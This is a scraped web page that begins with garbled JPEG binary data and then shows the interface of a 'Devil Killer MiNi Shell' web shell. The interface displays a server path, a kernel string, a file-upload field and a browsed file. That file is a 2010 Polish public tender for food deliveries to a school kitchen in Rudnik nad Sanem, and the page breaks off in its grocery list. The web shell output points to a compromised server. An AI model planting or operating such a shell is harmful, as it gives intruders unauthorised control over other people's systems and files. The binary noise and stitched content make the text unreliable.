JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101130/342423-N-2010.html

<p class="kh_header"><b>Rudnik nad Sanem: Dostawa produktów spożywczych i żywnościowych  do  kuchni Publicznego Gimnazjum im. Orląt w Rudniku nad Sanem</b><br>
<b>Numer ogłoszenia: 342423 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum im. Orląt , ul. Marszałka Józefa Piłsudskiego 7, 37-420 Rudnik nad Sanem, woj. podkarpackie, tel. 015 8762603, faks 015 8766193.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Publiczne Gminazjum.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych i żywnościowych  do  kuchni Publicznego Gimnazjum im. Orląt w Rudniku nad Sanem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa produktów spożywczych na potrzeby kuchni w Publicznym Gimnazjum im. Orląt w Rudniku nad Sanem, w tym:
1).Część 1: Dostawa mięsa i wędlin.  
Lp	Artykuł	Ilość
1.		Mięso szynkowe (szynka bez kości)	450 kg
2.		Mięso mielone wieprzowe	400 kg
3.		Schab bez kości	400 kg
4.		Karczek bez kości	400 kg
5.		Kiełbasa wiejska	150 kg
6.		Kiełbasa zwyczajna	120 kg
7.		Kiełbasa gilowa  do 100g 1szt	150 kg
8.		Boczek wędzony gotowany	30 kg
9.		Parówki wieprzowe cienkie	150 kg
10.		Mortadela	50 kg
11.		Słonina bez skóry	20 kg
12.		Kaszanka	100 kg
13.		Kości schabowe	300 kg
14.		Smalec 	50 kg
15.		Słonina	20 kg
16.		Filet drobiowy	800 kg
17.		Udka drobiowe	100 kg
18.		Kości drobiowe	200 kg
19.		Kurczak	20 kg
20.		Filety rybne z Soli	320 kg

b)Część 2: Dostawa warzyw oraz owoców.
Lp.	Artykuł	Ilość
1.		Ziemniaki	8000 kg
2.		Czosnek	15 kg
3.		Czosnek	40 szt
4.		Por	80 szt.
5.		Rzodkiewka	40 szt
6.		Natka pietruszki i kopru świeża 	500 szt
7.		Seler	100 kg
8.		Burak ćwikłowy	450 kg
9.		Marchew	750 kg
10.		Pietruszka korzeń	200 kg
11.		Cebula	300 kg
12.		Fasola Jaś duża	100 kg
13.		Fasola drobna groch biały	50 kg
14.		Groch łuskany	20 kg
15.		Papryka czerwona	5 kg
16.		Pomidory 	100 kg
17.		Pieczarki	10 kg
18.		Ogórek świeży	200 kg
19.		Kapusta biała	200 szt.
20.		Kapusta biała	100 kg
21.		Kapusta włoska	30 kg
22.		Kapusta włoska	60 szt.
23.		Kapusta pekińska	200 szt.
24.		Kalafior	50 szt.
25.		Truskawka świeża	6 kg
26.		Jabłko	1000 kg
27.		Gruszka	200 kg
28.		Brzoskwinia	100 kg
29.		Nektaryna	100 kg
30.		Banan	500 kg
31.		Cytryna	20 kg
32.		Pomarańcza	100 kg
33.		Mandarynka	150 kg
34.		Kapusta kiszona, wiadro 10 kg	100 szt.
35.		Ogórki kiszone, wiadro 6 kg	40  szt.
36.		Jabłka kostka krojona prażona wiadro 10 kg	10 szt.
37.		Sałatka z kapusty czerwonej, słoik 0,9kg 	50 szt.
38.		Sałatka warzywna, słoik 0,9kg 	50 szt.
39.		Kukurydza konserwowa 400g 	30 szt.
40.		Papryka czerwona konserwowa, słoik 0,9kg	30 szt.
41.		Ogórki korniszony, słoik 0,9kg	30 szt.
42.		Ćwikła z chrzanem, słoik 0,9 kg.	60 szt.

c) Część 3: Dostawa nabiału, tłuszczy oraz jajek
Lp.	Artykuł	Ilość
1.		Jajka spożywcze, klasa A, kategoria I (duże)	5 000 szt.
2.		Śmietana 22 %, 1 l	400 szt.
3.		Jogurt naturalny 1 l	50 szt.
4.		Jogurt naturalny 3 l	10 szt
5.		Mleko 2 %, karton 1 l	200 szt.
6.		Masło, min. 82% tł., 200 g	450 szt.
7.		Ser twarogowy, półtłusty, paczki do 1,5 kg	150 kg
8.		Ser żółty, gouda pełnotłusty, bloczki 1 - 1,5 kg	6 kg
9.		Jogurt, różne smaki, kubek do 125 g	1000 szt.
10.		Drożdże 100g	40 szt.

d)Część 4: Dostawa pieczywa.
Lp.	Artykuł	Ilość
1.		Chleb mieszany pakowany, krojony 0,9-1 kg	2000 szt.
2.		Rogaliki francuskie	900 szt.
3.		Bułka zwykła, świeża ok.100 g	300 szt.
4.		Andrut	20 kg
5.		Drożdżówki 100 g	900 szt.
6.		Drożdżówki 50 g	900 szt.
7.		Pączki	900 szt.
8.		Ciasto maślane/jogurtowe	40 kg
9.		Bułka tarta 0,5 kg	100 kg

e)Część 5: Dostawa artykułów spożywczych.
Lp.	Artykuł	Ilość
1.		Sól spożywcza jodowana, op. 1 kg	200 szt.
2.		Mąka pszenna, op. 1 kg	350 szt.
3.		Kasza jęczmienna gruba, op. 900g -1 kg	40 szt.
4.		Kasza gryczana, op. 1 kg	100 szt.
5.		Ryż biały op. 1kg	250 szt.
6.		Kasza manna, op. 0,5kg	100 szt.
7.		Cukier puder, op. 0,5 kg	5 szt.
8.		Rodzynki, op. 0,5 kg	5 szt.
9.		Cukier waniliowy, op. 32 g	80 szt.
10.		Cukier kryształ, op. 1 kg	900 szt.
11.		Miód pszczeli wielokwiatowy, słoik 400 g	10 szt.
12.		Makaron świderki, op. 500 g Lubella lub równoważny	500 szt.
13.		Makaron łazankowy, op. 500 g Lubella lub równoważny	150 szt.
14.		Makaron nitka, op. 500 g Lubella lub równoważny	100 szt.
15.		Makaron spaghetti, op. 500 g Lubella lub równoważny	100 szt.
16.		Herbata ekspresowa, 1 op. - 100 saszetek	200 szt.
17.		Mąka ziemniaczana, op. 0,5 kg	10 szt.
18.		Budyń, op. 1,30 kg	30 szt.
19.		Kisiel, różne smaki, op. 1,3 kg	45 szt.
20.		Sos pomidorowo  38g- 44 g	200 szt.
21.		Sos sałatkowy, op. 1 kg	2 szt.
22.		Sos cygański, op. 900 g	2 szt.
23.		Sos myśliwski op. 1kg	4 szt.
24.		Sos pieczarkowy, op. 1 kg	2 szt.
25.		Sos grzybowy, op. 1 kg	2 szt.
26.		Sos pieczeniowy, op. 1 kg	60 szt.
27.		Sos boloński, op. 1 kg	30 szt.
28.		Zupa ogonowa, op. 900g - 1 kg	10 szt.
29.		Zupa pieczarkowa, op. 1 kg	10 szt.
30.		Zupa grzybowa, op.1 kg	10 szt.
31.		Barszcz biały, op. 1 kg	20 szt.
32.		Zupa żur, op. 900g	20 szt.
33.		Jarzynka, op. 2,80kg lub równoważny	30 szt.
34.		Vegeta, op.1kg lub równoważny	20 szt.
35.		Rosołek drobiowy 380g	10 szt.
36.		Bulion drobiowy, wiaderko op. do 2,20 kg	5 szt.
37.		Przyprawa do zup w płynie, op. 1000 g ( butelka szklana)	50 szt.
38.		Ziele angielskie, op. 15 g	50 szt.
39.		Liście laurowe, op. 6-7 g	60 szt.
40.		Pieprz mielony, op. 20 g	200 szt.
41.		Majeranek, op. 20 g	60 szt.
42.		Kminek mielony, op. 20 g	40 szt.
43.		Kminek,  op. 6-7 g	40 szt.
44.		Przyprawy do mięsa wieprzowego, dań z kapusty i fasoli, op.30g g różne 	200 szt.
45.		Cynamon 15 g	30 szt.
46.		Majonez, słoik 700 ml	70 szt.
47.		Ketchup 1l	30 szt.
48.		Cytrynka w płynie  1l	6 szt.
49.		Koncentrat buraczany w płynie, op. 300 g	20 szt.
50.		Koncentrat żurku tradycyjnego w płynie, op. 0,5 l	70 szt.
51.		Soki, op. 0,2 l, różne smaki	1000 szt.
52.		Syrop owocowy do herbaty, butelka o poj. ok. 0,45-0,5 l, różne smaki	200 szt.
53.		Batonik czekoladowy	500 szt.
54.		Pyzy ziemniaczane zwykłe, op. netto 450 g 	440 szt.
55.		Pyzy ziemniaczane z mięsem, op. netto 450 g	250 szt.
56.		Mieszanka kompotowa, op. 2,5 kg, zestaw z truskawką	100 szt.
57.		Wiśnie bez pestek, op. 2,5 kg	30 szt.
58.		Włoszczyzna, bukiet jarzyn op. 2,5 kg	50 szt.
59.		Mrożona mieszanka 7 warzyw	50 kg
60.		Truskawka mrożona, op. 2,5  kg	24 szt.
61.		Kalafior mrożony, op. 2,5 kg	16 szt.
62.		Kluski śląskie 450g 	250 szt.
63.		Marchew kostka mrożona,op.2,5kg	24 szt.
64.		Marchew z groszkiem mrożona,op.2,5kg	50 szt.
65.		Placki ziemniaczane 1,5 kg	100 szt.
66.		Brokuły 2,5 kg	50 szt.
67.		Fasola szparagowa zielona cięta 2,5 kg	50 szt.
68.		Fasola szparagowa biała (żółta) 2,5 kg	50 szt.
69.		Barszcz ukraiński mrożony	40 kg
70.		Chrzan tarty  z kwaskiem 860g	40 szt
71.		Koncentrat pomidorowy 30%, słoik waga ok.1 kg Kotlin, Pudliszki lub równoważny	60 szt.
72.		Koncentrat pomidorowy 30%, słoik waga ok. 245g  Kotlin, Pudliszki lub równoważny	50 szt.
73.		Dżemy, słoik waga 250 - 300 g	30 szt.
74.		Olej słonecznikowy z pierwszego tłoczenia, op. 5 l Kujawski, lub równoważny	60 szt.
75.		Olej słonecznikowy z pierwszego tłoczenia, op. 3 l  Kujawski, lub równoważny	20 szt.

f)	Dostawa artykułów posiłki gotowe (garmażeryjne).
Lp.	Artykuł	Ilość
1.		Pierogi ruskie, wyrób garmażeryjny, cena 1 kg	500 kg
2.		Kluski kopytka, wyrób garmażeryjny, cena 1 kg	200 kg
3.		Naleśniki, wyrób garmażeryjny, cena 1 kg	70 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.40.00.00-2, 14.10.00.00-9, 15.11.00.00-2, 03.22.00.00-9, 03.14.25.00-3, 15.50.00.00-3, 15.81.00.00-9, 15.89.42.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy składający ofertę na dostawę mięsa i wędlin (Część 1) oraz jajek spożywczych (Część 3) muszą złożyć kopię certyfikatu, zaświadczenia lub innego dokumentu wystawionego przez właściwy organ Państwowej Inspekcji Sanitarnej lub organ Inspekcji Weterynaryjnej, potwierdzającego wdrożenie i stosowanie systemu HACCP (dot. zakładów produkujących lub wprowadzających do obrotu żywność). Jeżeli Wykonawca nie jest producentem zobowiązany jest dostarczać przedmiot zamówienia oraz w/w dokument, od producenta spełniającego takie wymagania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgrudnik.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Publiczne Gimnazjum im. Orląt w Rudniku nad Sanem, ul. Marszałka Józefa Piłsudskiego 7, 37 - 420 Rudnik nad Sanem, w pokoju nr 1c (Sekretariat).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 10:00, miejsce: Publiczne Gimnazjum im. Orląt w Rudniku nad Sanem, ul. Marszałka Józefa Piłsudskiego 7, 37 - 420 Rudnik nad Sanem, w pokoju nr 1c (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Mięso szynkowe (szynka bez kości)	450 kg
2.		Mięso mielone wieprzowe	400 kg
3.		Schab bez kości	400 kg
4.		Karczek bez kości	400 kg
5.		Kiełbasa wiejska	150 kg
6.		Kiełbasa zwyczajna	120 kg
7.		Kiełbasa gilowa  do 100g 1szt	150 kg
8.		Boczek wędzony gotowany	30 kg
9.		Parówki wieprzowe cienkie	150 kg
10.		Mortadela	50 kg
11.		Słonina bez skóry	20 kg
12.		Kaszanka	100 kg
13.		Kości schabowe	300 kg
14.		Smalec 	50 kg
15.		Słonina	20 kg
16.		Filet drobiowy	800 kg
17.		Udka drobiowe	100 kg
18.		Kości drobiowe	200 kg
19.		Kurczak	20 kg
20.		Filety rybne z Soli	320 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa warzyw oraz owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Ziemniaki	8000 kg
2.		Czosnek	15 kg
3.		Czosnek	40 szt
4.		Por	80 szt.
5.		Rzodkiewka	40 szt
6.		Natka pietruszki i kopru świeża 	500 szt
7.		Seler	100 kg
8.		Burak ćwikłowy	450 kg
9.		Marchew	750 kg
10.		Pietruszka korzeń	200 kg
11.		Cebula	300 kg
12.		Fasola Jaś duża	100 kg
13.		Fasola drobna groch biały	50 kg
14.		Groch łuskany	20 kg
15.		Papryka czerwona	5 kg
16.		Pomidory 	100 kg
17.		Pieczarki	10 kg
18.		Ogórek świeży	200 kg
19.		Kapusta biała	200 szt.
20.		Kapusta biała	100 kg
21.		Kapusta włoska	30 kg
22.		Kapusta włoska	60 szt.
23.		Kapusta pekińska	200 szt.
24.		Kalafior	50 szt.
25.		Truskawka świeża	6 kg
26.		Jabłko	1000 kg
27.		Gruszka	200 kg
28.		Brzoskwinia	100 kg
29.		Nektaryna	100 kg
30.		Banan	500 kg
31.		Cytryna	20 kg
32.		Pomarańcza	100 kg
33.		Mandarynka	150 kg
34.		Kapusta kiszona, wiadro 10 kg	100 szt.
35.		Ogórki kiszone, wiadro 6 kg	40  szt.
36.		Jabłka kostka krojona prażona wiadro 10 kg	10 szt.
37.		Sałatka z kapusty czerwonej, słoik 0,9kg 	50 szt.
38.		Sałatka warzywna, słoik 0,9kg 	50 szt.
39.		Kukurydza konserwowa 400g 	30 szt.
40.		Papryka czerwona konserwowa, słoik 0,9kg	30 szt.
41.		Ogórki korniszony, słoik 0,9kg	30 szt.
42.		Ćwikła z chrzanem, słoik 0,9 kg.	60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa nabiału, tłuszczy oraz jajek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Jajka spożywcze, klasa A, kategoria I (duże)	5 000 szt.
2.		Śmietana 22 %, 1 l	400 szt.
3.		Jogurt naturalny 1 l	50 szt.
4.		Jogurt naturalny 3 l	10 szt
5.		Mleko 2 %, karton 1 l	200 szt.
6.		Masło, min. 82% tł., 200 g	450 szt.
7.		Ser twarogowy, półtłusty, paczki do 1,5 kg	150 kg
8.		Ser żółty, gouda pełnotłusty, bloczki 1 - 1,5 kg	6 kg
9.		Jogurt, różne smaki, kubek do 125 g	1000 szt.
10.		Drożdże 100g	40 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Chleb mieszany pakowany, krojony 0,9-1 kg	2000 szt.
2.		Rogaliki francuskie	900 szt.
3.		Bułka zwykła, świeża ok.100 g	300 szt.
4.		Andrut	20 kg
5.		Drożdżówki 100 g	900 szt.
6.		Drożdżówki 50 g	900 szt.
7.		Pączki	900 szt.
8.		Ciasto maślane/jogurtowe	40 kg
9.		Bułka tarta 0,5 kg	100 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Artykuł	Ilość
1.		Sól spożywcza jodowana, op. 1 kg	200 szt.
2.		Mąka pszenna, op. 1 kg	350 szt.
3.		Kasza jęczmienna gruba, op. 900g -1 kg	40 szt.
4.		Kasza gryczana, op. 1 kg	100 szt.
5.		Ryż biały op. 1kg	250 szt.
6.		Kasza manna, op. 0,5kg	100 szt.
7.		Cukier puder, op. 0,5 kg	5 szt.
8.		Rodzynki, op. 0,5 kg	5 szt.
9.		Cukier waniliowy, op. 32 g	80 szt.
10.		Cukier kryształ, op. 1 kg	900 szt.
11.		Miód pszczeli wielokwiatowy, słoik 400 g	10 szt.
12.		Makaron świderki, op. 500 g Lubella lub równoważny	500 szt.
13.		Makaron łazankowy, op. 500 g Lubella lub równoważny	150 szt.
14.		Makaron nitka, op. 500 g Lubella lub równoważny	100 szt.
15.		Makaron spaghetti, op. 500 g Lubella lub równoważny	100 szt.
16.		Herbata ekspresowa, 1 op. - 100 saszetek	200 szt.
17.		Mąka ziemniaczana, op. 0,5 kg	10 szt.
18.		Budyń, op. 1,30 kg	30 szt.
19.		Kisiel, różne smaki, op. 1,3 kg	45 szt.
20.		Sos pomidorowo  38g- 44 g	200 szt.
21.		Sos sałatkowy, op. 1 kg	2 szt.
22.		Sos cygański, op. 900 g	2 szt.
23.		Sos myśliwski op. 1kg	4 szt.
24.		Sos pieczarkowy, op. 1 kg	2 szt.
25.		Sos grzybowy, op. 1 kg	2 szt.
26.		Sos pieczeniowy, op. 1 kg	60 szt.
27.		Sos boloński, op. 1 kg	30 szt.
28.		Zupa ogonowa, op. 900g - 1 kg	10 szt.
29.		Zupa pieczarkowa, op. 1 kg	10 szt.
30.		Zupa grzybowa, op.1 kg	10 szt.
